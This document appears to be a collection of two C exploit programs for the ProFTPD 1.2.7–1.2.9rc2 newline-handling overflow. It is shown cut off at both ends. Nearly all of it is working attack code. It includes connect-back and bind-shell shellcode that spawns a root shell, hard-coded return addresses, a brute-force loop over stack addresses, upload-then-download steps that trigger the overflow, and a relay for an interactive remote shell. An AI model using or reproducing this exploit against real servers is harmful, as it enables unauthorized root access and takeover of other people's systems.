"\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd"
"\x80\x31\xc0\xb0\x3f\x89\xd3\xb1"
"\x02\xcd\x80\x31\xc9\x51\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x51\x68\x2d\x69\x69\x70"
"\x89\xe2\x51\x52\x53\x89\xe1\x31"
"\xd2\x31\xc0\xb0\x0b\xcd\x80\x31"
"\xc0\xb0\x01\xcd\x80";
char bindshellcode[]= //from www.netric.org,and modified some code by myself
"\x90\x90\x90\x31\xc0\x31\xdb\x31"
"\xc9\xb0\x17\xcd\x80\x31\xc0\xb0"
"\x02\xcd\x80\x39\xc3\x7c\x0c\x31"
"\xc0\xb0\x02\xcd\x80\x39\xc3\x7c"
"\x02\xeb\x06\x31\xc0\xb0\x01\xcd"
"\x80\x51\x31\xc0\x51\xb1\x01\x51"
"\xb1\x02\x51\x89\xe1\xb3\x01\xb0"
"\x66\xcd\x80\x89\xc1\x31\xc0\x31"
"\xdb\x50\x50\x50\x66\x68\xb0\xef"
"\xb3\x02\x66\x53\x89\xe2\xb3\x10"
"\x53\xb3\x02\x52\x51\x89\xca\x89"
"\xe1\xb0\x66\xcd\x80\x31\xdb\x39"
"\xc3\x74\x05\x31\xc0\x40\xcd\x80"
"\x31\xc0\x50\x52\x89\xe1\xb3\x04"
"\xb0\x66\xcd\x80\x89\xd7\x31\xc0"
"\x31\xdb\x31\xc9\xb3\x11\xb1\x01"
"\xb0\x30\xcd\x80\x31\xc0\x31\xdb"
"\x50\x50\x57\x89\xe1\xb3\x05\xb0"
"\x66\xcd\x80\x89\xc6\x31\xc0\x31"
"\xc9\x89\xf3\xb0\x3f\xcd\x80\x31"
"\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
"\x41\xb0\x3f\xcd\x80\x31\xc9\x51"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x51\x68\x2d\x69"
"\x69\x69\x89\xe2\x51\x52\x53\x89"
"\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
"\x80";
int sockfd,sockfd1,sockfd2;
int show=0;
int mustread=0;
int getshell=0;
int pt=6000;
unsigned int type=1;
char bindmethod=0;
char usrstr[]="USER";
char passtr[]="PASS";
char ascistr[]="TYPE A";
char pasvstr[]="PASV";
char portstr[]="PORT";
char storstr[]="STOR";
char retrstr[]="RETR";
char cmdbuf[SIZE];
char srvbuf[SIZE];
char *cbhost=NULL;
char *server=NULL;
struct
{
char *os;
unsigned int ret;
int backup; //using for next
} targets[] =
{
{ "rh8.0 ProFTPD 1.2.8 (stable) 1", 0xbffff25c,0},
{ "rh8.0 ProFTPD 1.2.8 (stable) 2", 0xbffff22c,0},
},v;
//main() {}
int sendbuf(int socket,char *buffer,int len);
int readbuf(char *s,int socket,char *buffer,int len);
int client_connect(int sockfd,char* server,int port);
void checkstatus(char *s);
void retrfile(char *s,int len,int port);
void storfile(char *s,int len,int port);
int dealpasv(char *s);
int setpasv();
void setport(char *l,int pt1);
void quit();
void storbuf(char *filename,char *buf,int size,int port);
void retrbuf(char *filename,char *buffer,int length,int port1);
void setascii();
void loginftp(char *user,char *pass);
void setfilename(char *s,int len);
int createbuffer(char *s,int len,int type,char *h);
int create_serv(int sfd,int port);
void modify(char *s,char *h,int port3);
void usage(char *s);
int execsh(int clifd);
int checklf(void *s,int len);
main(int argc,char **argv)
{
char buffer[BIGSIZE];
char cmdbuf[SIZE];
char srvbuf[SIZE];
char filename[30];
int j,a,b,port1;
int total;
char c;
char *user=NULL;
char *pass=NULL;
char *localip=NULL;
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "d:t:u:p:l:h:o:"))!= EOF)
{
switch (c)
{
case 'd':
server=optarg;
break;
case 't':
type = atoi(optarg);
if((type > sizeof(targets)/sizeof(v)) || (type < 1))
usage(argv[0]);
break;
case 'u':
user=optarg;
break;
case 'p':
pass=optarg;
break;
case 'l':
localip=optarg;
break;
case 'h':
cbhost=optarg;
break;
case 'o':
pt=atoi(optarg) & 0xffff;
break;
default:
usage(argv[0]);
return 1;
}
}
if(server==NULL || user==NULL || pass==NULL || localip==NULL)
usage(argv[0]);
printf("@---------------------------------------------------------@\n");
printf("# proftpd 1.2.7/1.2.9rc2 remote root exploit(01/10)-%s #\n",VER);
printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
printf("-----------------------------------------------------------\n");
printf("[+] Ret address:%p\n",targets[type-1].ret);
if(cbhost==NULL)
bindmethod=1;
else
{
if((int)inet_addr(cbhost)==-1)
{
printf("[-] Invalid connect back host/ip\n");
exit(0);
}
bindmethod=0;
}
port1=34568; //PORTÃüÃîµÄʱºòÔ Ú±¾µØ²úÉúµÄÃ� �»¸ö¶Ë¿Ú.
sockfd=sockfd1=sockfd2=0;
sockfd=socket(2,1,0);
if(client_connect(sockfd,server,PORT)<0) quit();
loginftp(user,pass);
//port1=setpasv(); //get the pasv port
setport(localip,port1);
setfilename(filename,30);
setascii();
total=createbuffer(buffer,BIGSIZE,type,cbhost);
//printf("[+] buffer data size:%d\n",total);
storbuf(filename,buffer,total,port1);
//stor over, then close and reconnect
close(sockfd);
close(sockfd1);
close(sockfd2);
sockfd=socket(2,1,0);
if(client_connect(sockfd,server,PORT)<0) quit(); //reconnect
loginftp(user,pass);
setascii();
setport(localip,port1); //get the pasv port,a new one
mustread=total;
retrbuf(filename,buffer,total,port1);
readbuf("The First time read",sockfd,srvbuf,SIZE);
port1++;
setport(localip,port1);
mustread=total;
getshell=1;
retrbuf(filename,buffer,total,port1);
quit();
}
void setfilename(char *s,int len)
{
int a;
memset(s,0,len);
a=getpid();
sprintf(s,"%d%d%d.txt",a,a,a);
}
void retrfile(char *s,int len,int port)
{
int i,pid;
char data1;
struct sockaddr_in client;
memset(&client,0,sizeof(client));
sockfd1=socket(2,1,0);
if(create_serv(sockfd1,port)<0) quit();
i=sizeof(client);
sockfd2=accept(sockfd1,(struct sockaddr *)&client,&i);
printf("[+] Accepted a client from %s\n",inet_ntoa(client.sin_addr));
memset(s,0,len);
if(getshell==1)
{
if(bindmethod==0)
{
printf("[+] Is it a shell on %s:%d?\n",cbhost,pt);
quit();
}
else
{
printf("[+] Waiting for a shell.....\n");
sockfd2=socket(AF_INET,SOCK_STREAM,0);
sleep(2);
client_connect(sockfd2,server,pt);
execsh(sockfd2);
quit();
}
}
readbuf(NULL,sockfd2,s,len);
close(sockfd2);
close(sockfd1);
}
void storfile(char *s,int len,int port)
{
int i;
struct sockaddr_in client;
memset(&client,0,sizeof(client));
sockfd1=socket(2,1,0);
if(create_serv(sockfd1,port)<0) quit();
//if(client_connect(sockfd1,HOST,port)<0) quit();
i=sizeof(client);
sockfd2=accept(sockfd1,(struct sockaddr *)&client,&i);
printf("[+] Accepted a client from %s\n",inet_ntoa(client.sin_addr));
sendbuf(sockfd2,s,len);
close(sockfd2);
close(sockfd1);
}
void setport(char *l,int pt1)
{
int a,i,b,c,j;
char buf[30];
memset(buf,0,30);
i=sprintf(buf,"%s",l);
for(a=0;a<i;a++)
if(buf[a]=='.') buf[a]=',';
memset(cmdbuf,0,SIZE);
b=(pt1 >> 8 ) & 0xff;
c=pt1 & 0xff;
j=sprintf(cmdbuf,"%s %s,%d,%d\r\n",portstr,buf,b,c);
printf("[+] %s",cmdbuf);
sendbuf(sockfd,cmdbuf,j);
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
}
int dealpasv(char *s)
{
int a,b,c,d,e,f,g;
char *p1,*p2,*p3;
int i;
p1=(char *)malloc(100);
if(!s)
quit();
p2=strchr(s,'(');
//printf("p2:%s\n",p2);
p3=strchr(s,')');
//printf("p3:%s\n",p3);
p3++;
i=p3-p2;
memcpy(p1,p2,i);
p1[i]='\0';
//printf("p1:%s\n",p1);
sscanf(p1,"(%d,%d,%d,%d,%d,%d)",&a,&b,&c,&d,&e,&f);
//printf("a:%d,b:%d,c:%d,d:%d,e:%d,f:%d\n",a,b,c,d,e,f);
g=(e<<8) | f;
//printf("port:%d\n",g);
free(p1);
return g;
}
void quit()
{
if(sockfd>0)
close(sockfd);
if(sockfd1>0)
close(sockfd);
if(sockfd2>0)
close(sockfd);
exit(0);
}
int sendbuf(int socket,char *buffer,int len)
{
int j;
j=send(socket,buffer,len,0);
if(j==0)
{
printf("[-] server closed the socket\n");
quit();
}
if(j<0)
{
perror("[-] Send data error");
quit();
}
return j;
}
int readbuf(char *s,int socket,char *buffer,int len)
{
int a,b,i,j=0;
a=b=i=0;
memset(buffer,0,len);
if(s)
{
printf("[+] %s:",s);
fflush(stdout);
}
//j=lseek(socket,0,2);
//printf("j:%d\n",j);
if(mustread==0)
{
j=recv(socket,buffer,len-1,0);
if(j==0)
{
if(s)
printf("FAILED\n");
printf("[-] server closed the socket\n");
quit();
}
if(j<0)
{
if(s)
printf("FAILED\n");
perror("[-] read data error");
quit();
}
if(s)
printf("ok\n");
buffer[len-1]='\0';
if(show==1)
printf("<== %s",buffer);
}
else
{
//ÎÒÃDz»ÓùØÃÃ� ��·µ»ØһéʲÃÂ� �Êý¾Ã
b=mustread-i;
while(b>0)
{
a=b>(len-1)?(len-1):b;
i=recv(socket,buffer,a,0);
if(i==0)
{
if(s)
printf("FAILED\n");
printf("[-] server closed the socket\n");
quit();
}
if(i<0)
{
if(s)
printf("FAILED\n");
perror("[-] read data error");
quit();
}
if(s)
printf("ok\n");
b-=i;
j+=i;
}
//printf("j:%d,mustread:%d\n",j,mustread);
if(j!=mustread)
{
printf("read failed\n");
quit();
}
}
//show=0;
mustread=0;
return j;
}
int client_connect(int sockfd,char* server,int port)
{
struct sockaddr_in cliaddr;
struct hostent *host;
if((host=gethostbyname(server))==NULL)
{
printf("gethostbyname(%s) error\n",server);
return(-1);
}
bzero(&cliaddr,sizeof(struct sockaddr));
cliaddr.sin_family=AF_INET;
cliaddr.sin_port=htons(port);
cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
printf("[+] Trying %s:%d....",server,port);
fflush(stdout);
if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
{
printf("error:%s\r\n",strerror(errno));
close(sockfd);
return(-1);
}
printf("ok\r\n");
return(0);
}
void checkstatus(char *s)
{
if(s==NULL)
quit();
if(isdigit(*s))
{
if(s[0]=='5')
{
printf("[-] Server told:%s\n",s);
quit();
}
else
return;
}
printf("[-] Server said:%s\n",s);
quit();
}
void loginftp(char *user,char *pass)
{
int j;
show=1;
readbuf("Get banner",sockfd,srvbuf,SIZE);
show=0;
memset(cmdbuf,0,SIZE);
//USER
j=sprintf(cmdbuf,"%s %s\r\n",usrstr,user);
sendbuf(sockfd,cmdbuf,j);
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
//PASS
memset(cmdbuf,0,SIZE);
j=sprintf(cmdbuf,"%s %s\r\n",passtr,pass);
sendbuf(sockfd,cmdbuf,j);
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
printf("[+] User %s logged in\n",user);
}
int setpasv()
{
int j,port1;
memset(cmdbuf,0,SIZE);
j=sprintf(cmdbuf,"%s\r\n",pasvstr);
sendbuf(sockfd,cmdbuf,j);
readbuf("Set PASV",sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
port1=dealpasv(srvbuf); //get the pasv port
return port1;
}
void setascii()
{
int j;
memset(cmdbuf,0,SIZE);
j=sprintf(cmdbuf,"%s\r\n",ascistr);
sendbuf(sockfd,cmdbuf,j);
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
}
void storbuf(char *filename,char *buf,int size,int port)
{
int j;
printf("[+] STOR file %s\n",filename);
memset(cmdbuf,0,SIZE);
j=sprintf(cmdbuf,"%s %s\r\n",storstr,filename);
sendbuf(sockfd,cmdbuf,j);
storfile(buf,size,port);
//check if the content is send overd
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
}
void retrbuf(char *filename,char *buffer,int length,int port1)
{
int j;
printf("[+] RETR file %s\n",filename);
memset(cmdbuf,0,SIZE);
j=sprintf(cmdbuf,"%s %s\r\n",retrstr,filename);
sendbuf(sockfd,cmdbuf,j);
retrfile(buffer,length,port1);
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
}
int createbuffer(char *s,int len,int type,char *h)
{
int i,a,total;
char buf[41];
unsigned int writeaddr=targets[type-1].ret;
writeaddr-=4;
if(checklf((void *)&writeaddr,4)<0)
{
printf("[-] Sorry, the ret addr %p=%p-4 have '\\n' char.\n",writeaddr,writeaddr+4);
quit();
}
a=i=0;
memset(s,0,len);
i+=3;
*(unsigned int *)(s+i)=writeaddr+7*4;
i+=4;
*(unsigned int *)(s+i)=writeaddr-0x600;
i+=4;
*(unsigned int *)(s+i)=writeaddr-0x400;
i+=4;
*(unsigned int *)(s+i)=writeaddr-0x200;
i+=4;
*(unsigned int *)(s+i)=writeaddr-0x300;
i+=4;
*(unsigned int *)(s+i)=0x0;
i+=4;
*(unsigned int *)(s+i)=0x90900eeb;
i+=4;
*(unsigned int *)(s+i)=0x0;
i+=4;
*(unsigned int *)(s+i)=0x0;
i+=4;
*(unsigned int *)(s+i)=0x0;
i+=4;
//connectback shellcode,modified ip & port
if(bindmethod==0)
{
modify(cbshellcode,h,pt);
memcpy(s+i,cbshellcode,strlen(cbshellcode));
i+=strlen(cbshellcode);
}
else
{
modify(bindshellcode,NULL,pt);
memcpy(s+i,bindshellcode,strlen(bindshellcode));
i+=strlen(bindshellcode);
}
memset(s+i,'Z',512-i);
memset(s+512,'\n',512);
total=1024;
memset(buf,0,41);
i=0;
memset(buf,'\n',20);
i+=20;
*(unsigned int *)(buf+i)=writeaddr;
i+=4;
*(unsigned int *)(buf+i)=writeaddr;
i+=4;
*(unsigned int *)(buf+i)=writeaddr+0x800; //here,the value must great than 0x600
i+=4;
*(unsigned int *)(buf+i)=writeaddr;
i+=4;
*(unsigned int *)(buf+i)=writeaddr;
//showmem(buf,40);
for(i=0;i<1024;i++)
{
a=(i*40)+1024;
memcpy(s+a,buf,40);
total+=40;
}
return total;
}
int create_serv(int sfd,int port)
{
struct sockaddr_in srvaddr;
int on=1;
bzero(&srvaddr,sizeof(struct sockaddr));
srvaddr.sin_port=htons(port);
srvaddr.sin_family=AF_INET;
srvaddr.sin_addr.s_addr=htonl(INADDR_ANY);
printf("[+] Listening on %d ....",port);
fflush(stdout);
setsockopt(sfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on)); //so I can rebind the port
if(bind(sfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<0)
{
printf("FAILED\n");
perror("[-] Bind port error");
return(-1);
}
if(listen(sfd,5)<0)
{
printf("FAILED\n");
perror("[-] Listen error");
return(-1);
}
printf("ok\n");
return(0);
}
void modify(char *s,char *h,int port3)
{
int a,b,c,d;
if(h!=NULL)
{
sscanf(h,"%d.%d.%d.%d",&a,&b,&c,&d);
a&=0xff;
b&=0xff;
c&=0xff;
d&=0xff;
if((char)a=='\n' || (char)b=='\n' || (char)c=='\n' || (char)d=='\n')
{
printf("[-] Sorry, the connect back ip:%s have '\\n' char\n",h);
}
s[OFFSET] = a & 0xff;
s[OFFSET+1] = b & 0xff;
s[OFFSET+2] = c & 0xff;
s[OFFSET+3] = d & 0xff;
a=port3 >> 8 & 0xff;
b=port3 & 0xff;
if((char)a=='\n' || (char)b=='\n')
{
printf("[-] Sorry, the connect back port:%d have '\\n' char\n",port3);
quit();
}
s[OFFSET+6]=a;
s[OFFSET+7]=b;
}
else
{
a=port3 >> 8 & 0xff;
b=port3 & 0xff;
if((char)a=='\n' || (char)b=='\n')
{
printf("[-] Sorry, the bind port:%d have '\\n' char\n",port3);
quit();
}
s[OFF2]=a;
s[OFF2+1]=b;
}
}
void usage(char *s)
{
unsigned int a;
char *p;
int d=strlen(s)+1;
p=(char *)malloc(d);
memset(p,0x20,d-1);
p[d-1]=0;
printf("@---------------------------------------------------------@\n");
printf("# proftpd 1.2.7/1.2.9rc2 remote root exploit(01/10)-%s #\n",VER);
printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
printf("-----------------------------------------------------------\n");
printf("Usage:%s -d <host> -u <user> -p <pass> -t <type>\n",s);
printf(" %s -l <local ip> -h <cbip> -o <cbport>\n",p);
printf("Arguments:\n");
printf(" -d target host ip/name\n");
printf(" -u user name\n");
printf(" -p user paasword\n");
printf(" -l the ip of this machine u used\n");
printf(" -h connect back ip\n");
printf(" -o connect back port/bind port\n");
printf(" -t target type [default:%d]\n",type);
printf(" ------------------------------\n");
for(a = 0; a < sizeof(targets)/sizeof(v); a++)
printf(" %d [0x%.8x]: %s\n", a+1, targets[a].ret, targets[a].os);
printf("\n");
free(p);
exit(0);
}
int execsh(int clifd)
{
fd_set fds;
int count;
char buffer[SIZE];
memset(buffer,0,SIZE);
while(1)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(clifd, &fds);
if (select(clifd+1, &fds, NULL, NULL, NULL) < 0)
{
if (errno == EINTR) continue;
break;
}
if (FD_ISSET(0, &fds))
{
count = read(0, buffer, SIZE);
if (count <= 0) break;
if (write(clifd, buffer, count) <= 0) break;
memset(buffer,0,SIZE);
}
if (FD_ISSET(clifd, &fds))
{
count = read(clifd, buffer, SIZE);
if (count <= 0) break;
if (write(1, buffer, count) <= 0) break;
memset(buffer,0,SIZE);
}
}
}
int checklf(void *sd,int len)
{
char *a;
int i=0;
a=(char *)sd;
for(i=0;i<len;i++)
if(*(a+i)=='\n') //found it
return -1;
return 0;
}
// [2003-10-04]
21 ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit
/*
ProFTPd 1.2.7 - 1.2.9rc2 remote r00t exploit
--------------------------------------------
By Haggis
This exploit builds on the work of bkbll to
create a working, brute-force remote exploit
for the \n procesing bug in ProFTPd.
Tested on SuSE 8.0, 8.1 and RedHat 7.2/8.0
it works quite well... the RedHat boxes
worked on stack addresses in the 0xbffff2xx
region; the SuSE boxes were somewhat earlier
in the stack space - around 0xbfffe8xx.
This is the only public version you'll see
from Haggis@Doris - but it is very likely
that more powerful private versions will
be coded.
At present, this exploit breaks chroot (if
any) and spawns a shell bound to port 4660.
----------
This version is best run like so:
./proft_put_down -t hostname -l localIP -U incoming
where:
hostname = target box
localIP = your IP address
-U incoming specifies that the exploit will attempt
to create an 'incoming' directory on the remote ftp
server and work inside that. Without it, the shell-
code will probably not work properly. You have been
warned!
It is possible to use other credentials for logging
in to remote servers; anonymous is the default.
H.
*/
#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <stdarg.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/tcp.h>
#define STACK_START 0xbfffef04
#define STACK_END 0xbffff4f0
#define FTP_PORT 21
#define BINDSHELL_PORT 4660
#define SIZE 1024
#define EXPLOIT_BUF_SIZE 65535
#define DEFAULT_USER "anonymous"
#define DEFAULT_PASS "ftp@"
#define FAILURE -1
#define SUCCESS 0
#define NORMAL_DOWNLOAD 1
#define EXPLOIT_DOWNLOAD 2
#define DOWNLOAD 3
#define UPLOAD 4
#define ACCEPT_TIMEOUT 5
#define SLEEP_DELAY 19999999
/*
Leet 0-day HaggisCode (tm)
*/
char shellcode[] =
// setuid(0); setgid(0);
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80"
// fork() - parent terminates, killing proftpd and ending FTP
// session. This leaves the child process as a daemon...
"\x31\xc0\xb0\x02\xcd\x80\x89\xc3\x85\xdb\x74\x08\x 31"
"\xdb\x31\xc0\xb0\x01\xcd\x80"
// Finally, bind a shell to port 4660.
// This is a hacked version of the bindshell code by BigHawk.
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\x e1\x4b\xcd\x80"
"\x89\xc7\x52\x66\x68\x12\x34\x43\x66\x53\x89\xe1\x b0\x10\x50\x51"
"\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x 80\x50\x50\x57"
"\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x 3f\x49\xcd\x80"
"\x41\xe2\xf8\x51\x68\x2e\x2f\x61\x61\x89\xe3\x51\x 53\x89\xe1\xb0"
"\x0b\xcd\x80";
int controlSock, passiveSock;
int currentPassivePort=32769;
int currentServerPort=31337;
int exploitBufLen;
int attemptNumber=0;
int ftpPort=FTP_PORT;
unsigned int stackWriteAddr, retAddr;
char serverBuf[SIZE];
char exploitBuf[EXPLOIT_BUF_SIZE];
char uploadPath[SIZE]="";
char filename[SIZE*2];
char *server=NULL;
char *user=DEFAULT_USER;
char *pass=DEFAULT_PASS;
char *localIP=NULL;
char errorBuf[SIZE];
int connect_to_server(int port);
int login_to_server();
int set_passive_mode(int mode);
int set_ascii_mode();
int set_path_and_filename();
int check_for_linefeed();
int check_status();
int create_passive_server();
int create_exploit_buffer();
int upload_file();
int download_file(int mode);
void usage(char *s);
int do_remote_shell(int shellSock);
void status_bar(char *info);
int timeout_accept(int s, struct sockaddr *sa, int *f);
void my_send(int s, char *b, ...);
void my_recv(int s);
void my_sleep(int n);
void doris_chroot_breaker();
int main(int argc,char **argv)
{
int sleepMode=0;
char c;
unsigned int stackStartAddr=STACK_START;
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:p:l:U:sP:S:"))!= EOF) {
switch (c) {
case 't':
server=optarg;
break;
case 'u':
user=optarg;
break;
case 'p':
pass=optarg;
break;
case 'l':
localIP=optarg;
break;
case 's':
sleepMode=1;
break;
case 'U':
strncpy(uploadPath,optarg,SIZE);
break;
case 'P':
ftpPort=atoi(optarg);
break;
case 'S':
stackStartAddr=strtoul(optarg, NULL, 16);
break;
default:
usage(argv[0]);
return 1;
}
}
if(server==NULL || localIP==NULL)
usage(argv[0]);
printf("proftpd 1.2.7 - 1.2.9rc2 remote r00t exploit\n");
printf(" by Haggis ([email protected])\n");
doris_chroot_breaker();
for(stackWriteAddr=stackStartAddr; stackWriteAddr<STACK_END; stackWriteAddr+=4, attemptNumber++) {
if(check_for_linefeed()==FAILURE)
continue;
retAddr=stackWriteAddr+200; // good enough for show business
if((controlSock=connect_to_server(ftpPort))==FAILU RE) {
perror("\n\nFailing to connect to remote host\n");
exit(1);
}
if(login_to_server()==FAILURE) {
close(controlSock);
printf("\nERROR: Login failed.\n");
exit(1);
}
if(set_passive_mode(UPLOAD)==FAILURE)
goto err;
if(set_ascii_mode()==FAILURE)
goto err;
if(set_path_and_filename()==FAILURE)
goto err;
// create the buffer containing RET for this
// brute-force iteration
create_exploit_buffer();
if(upload_file()==FAILURE)
goto err;
close(controlSock);
// Connect again, then login, set ASCII mode and download the exploit file.
// This will trigger the overflow; as a result, we've
// corrupted the memory pool of this session and when we
// download the file again, the stack area will be overwritten
// and we control the saved EIP.
if((controlSock=connect_to_server(ftpPort))<0) {
perror("\nFailed to connect to remote host\n");
exit(1);
}
login_to_server(user,pass);
set_path_and_filename();
if(set_ascii_mode()==FAILURE)
goto err;
if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
if(sleepMode)
sleep(10);
if(download_file(NORMAL_DOWNLOAD)==FAILURE)
goto err;
// Finally, read the file again. This will trigger the stack
// overwrite (NOT the overflow, that happened earlier). We could
// control EIP at this point and r00t may be only heartbeat away...
if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
if(download_file(EXPLOIT_DOWNLOAD)==FAILURE)
goto err;
err:
close(controlSock);
}
// This is only reached if the bruteforce fails.
// delete the exploit files here
printf("\n\nNo r00t for you today I'm afraid.\n");
exit(1);
}
void status_bar(char *info) {
printf("[ %20s ]-[ Stack: 0x%08x ]-[ RET: 0x%08x ]\r",info, stackWriteAddr,retAddr);
fflush(stdout);
}
int set_path_and_filename()
{
status_bar("Setting filename");
if(strcmp(uploadPath,"")) {
my_send(controlSock, "CWD %s\r\n",uploadPath);
my_recv(controlSock);
}
snprintf(filename,SIZE,"proft_put_down-%d-%d.txt",getpid(),attemptNumber);
return SUCCESS;
}
int download_file(int mode)
{
int len, localServerSock, dataSock, bindShellSock;
struct sockaddr_in localServer;
status_bar("Downloading");
// Ask the victim server to send us the exploit file
my_send(controlSock, "RETR %s\r\n", filename);
// Create a listening server on our passive port to
// receive the data
memset(&localServer,0,sizeof(localServer));
localServerSock=create_passive_server();
len=sizeof(localServer);
// Wait for a few seconds for the victim server to contact us...
if((dataSock=timeout_accept(localServerSock,(struc t sockaddr *)&localServer,&len))<0) {
close(localServerSock);
return FAILURE;
}
// If the mode is EXPLOIT_DOWNLOAD, then this is the
// second attempt at downloading... that means we might
// have a shell waiting for us on the victim server, so
// we try to connect to it
if(mode==EXPLOIT_DOWNLOAD) {
if((bindShellSock=connect_to_server(BINDSHELL_PORT ))>=0) {
printf("\nConnected! You are r00t...\n");
do_remote_shell(bindShellSock);
printf("\nDid you have a nice time?\n");
exit(0);
}
close(dataSock);
close(localServerSock);
return SUCCESS;
}
// If the mode is NORMAL_DOWNLOAD, then just clean up the
// connection by receiving the file from the server; closing
// the data and local server sockets, then read the confirmation
// message from the control socket
my_recv(dataSock);
close(dataSock);
close(localServerSock);
my_recv(controlSock);
return check_status();
}
int timeout_accept(int s, struct sockaddr *sa, int *f)
{
fd_set fdset;
struct timeval timeout = { ACCEPT_TIMEOUT, 0 }; // seconds
int result;
if(s<=0)
return FAILURE;
FD_ZERO(&fdset);
FD_SET(s, &fdset);
if((result=select(s+1, &fdset, 0, 0, &timeout))==0)
return FAILURE;
return accept(s,sa,f);
}
int set_passive_mode(int mode)
{
int portMSB, portLSB;
int x1,x2,x3,x4;
char *ptr=localIP, *start;
status_bar("Setting passive");
if(mode==DOWNLOAD) {
if((++currentPassivePort) > 35000)
currentPassivePort=32789;
while(*(++ptr))
if(*ptr=='.')
*ptr=',';
portMSB=(currentPassivePort >> 8 ) & 0xff;
portLSB=currentPassivePort & 0xff;
my_send(controlSock, "PORT %s,%d,%d\r\n", localIP, portMSB, portLSB);
my_recv(controlSock);
return check_status();
} else {
my_send(controlSock, "PASV\r\n");
my_recv(controlSock);
if(check_status()==FAILURE)
return FAILURE;
ptr=serverBuf;
while(*ptr && *ptr!='(')
ptr++;
if(*ptr=='\0')
return FAILURE;
start=ptr+1;
while(*ptr && *ptr!=')')
ptr++;
*ptr=0;
sscanf(start, "%d,%d,%d,%d,%d,%d",&x1, &x2, &x3, &x4, &portMSB, &portLSB);
currentServerPort=(portMSB << 8) | portLSB;
}
return SUCCESS;
}
int connect_to_server(int port)
{
struct sockaddr_in serverAddr;
struct hostent *host;
int sock, tmp=1;
status_bar("Connecting");
if((host=gethostbyname(server))==NULL)
return FAILURE;
if((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))<0)
return FAILURE;
bzero(&serverAddr,sizeof(struct sockaddr));
serverAddr.sin_family=AF_INET;
serverAddr.sin_port=htons(port);
serverAddr.sin_addr=*((struct in_addr *)host->h_addr);
setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *)&tmp, sizeof(tmp));
if(connect(sock,(struct sockaddr *)&serverAddr,sizeof(struct sockaddr))<0) {
close(sock);
return FAILURE;
}
return sock;
}
int check_status()
{
if(isdigit(serverBuf[0]) && serverBuf[0]!='5')
return SUCCESS;
else
return FAILURE;
}
int login_to_server()
{
status_bar("Logging in");
my_recv(controlSock);
my_send(controlSock, "USER %s\r\n", user);
my_recv(controlSock);
if(check_status()==FAILURE)
return FAILURE;
my_send(controlSock, "PASS %s\r\n", pass);
my_recv(controlSock);
return check_status();
}
int set_ascii_mode()
{
status_bar("Setting ASCII mode");
my_send(controlSock, "TYPE A\r\n");
my_recv(controlSock);
return check_status();
}
int upload_file()
{
int dataSock;
status_bar("Uploading file");
// open up the data channel
if((dataSock=connect_to_server(currentServerPort)) ==FAILURE)
return FAILURE;
// tell server we're gonna send some shiznitz
my_send(controlSock, "STOR %s\r\n", filename);
my_recv(controlSock);
if(check_status()==FAILURE) {
close(dataSock);
return FAILURE;
}
// send the exploit file to the victim server
send(dataSock, exploitBuf, exploitBufLen, 0);
close(dataSock);
// make sure all went well
my_recv(controlSock);
if(check_status()==FAILURE)
return FAILURE;
return SUCCESS;
}
int create_exploit_buffer()
{
int i;
char buf[41];
unsigned int writeaddr=stackWriteAddr;
unsigned int *ptr=(unsigned int *)(exploitBuf+3);
unsigned int dummy=0x11111111;
FILE *fp;
status_bar("Make exploit buf");
exploitBufLen=1024;
memset(exploitBuf,0,EXPLOIT_BUF_SIZE);
memset(exploitBuf,0x90,512);
*(ptr++)=writeaddr+28;
for(i=0;i<6;i++)
*(ptr++)=retAddr;
*(ptr++)=0;
for(i=0;i<2;i++)
*(ptr++)=retAddr;
memcpy(exploitBuf+512-strlen(shellcode)-1,shellcode,strlen(shellcode));
memset(exploitBuf+512,'\n',512);
for(i=0;i<96;i++) {
memset(buf,0,41);
if(dummy==0x1111112e)
// this sets session.d->outstrm to NULL which forces an early return
// avoids crashing proftpd... on SuSE 8.0 anywayz...
memcpy(buf,"\n\n\n\n\n\n\n\n\x00\x00\x00\x00\n\n\n\n\n\n\n\n",20);
else if(dummy==0x11111166)
// this is the same thing tailored for RH7.2
memcpy(buf,"\n\n\n\n\n\n\n\n\x72\x00\x00\x00\x00\n\n\n\n\n\n\n",20);
else
memset(buf,'\n',20);
// i used these dummy values to find the correct spot for
// the session.d->outstrm pointer
*(unsigned int *)(buf+20)=dummy;
